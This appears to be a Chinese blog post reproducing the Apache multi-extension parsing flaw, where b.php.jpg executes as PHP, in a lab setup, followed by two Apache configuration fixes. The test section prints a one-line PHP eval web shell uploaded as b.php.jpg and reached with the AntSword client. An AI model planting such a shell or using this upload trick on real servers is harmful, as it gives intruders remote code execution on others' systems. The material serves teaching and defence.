服务器容器漏洞-apache apache_parsing_vulnerability
Apache两个解析漏洞复现及防御方法 - FreeBuf网络安全行业门户
1、介绍
名称:apache apache_parsing_vulnerability
编号:
原理:apache默认从右往左匹配后缀名,比如b.php.jpg,会作为b.php执行
应用:apache
版本:
2、测试
2.1 靶场搭建
2.2 测试过程
(1)上传b.php.jpg
<?php
eval(@$_POST['axx']);
?>
(2)中国蚁剑连接
3、漏洞防护
(1)拒绝所有文件名含有.php的文件
<FilesMatch "\.php\.">
require all denied
</FilesMatch>
(2)处理程序只处理以.php结尾的文件
首先将上一个防御方案的配置命令注释掉
再注释掉原本的处理出现配置命令AddHandler application/x-httpd-php .php
<FilesMatch ".+.php$">
SetHandler application/x-httpd-php
</FilesMatch>
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战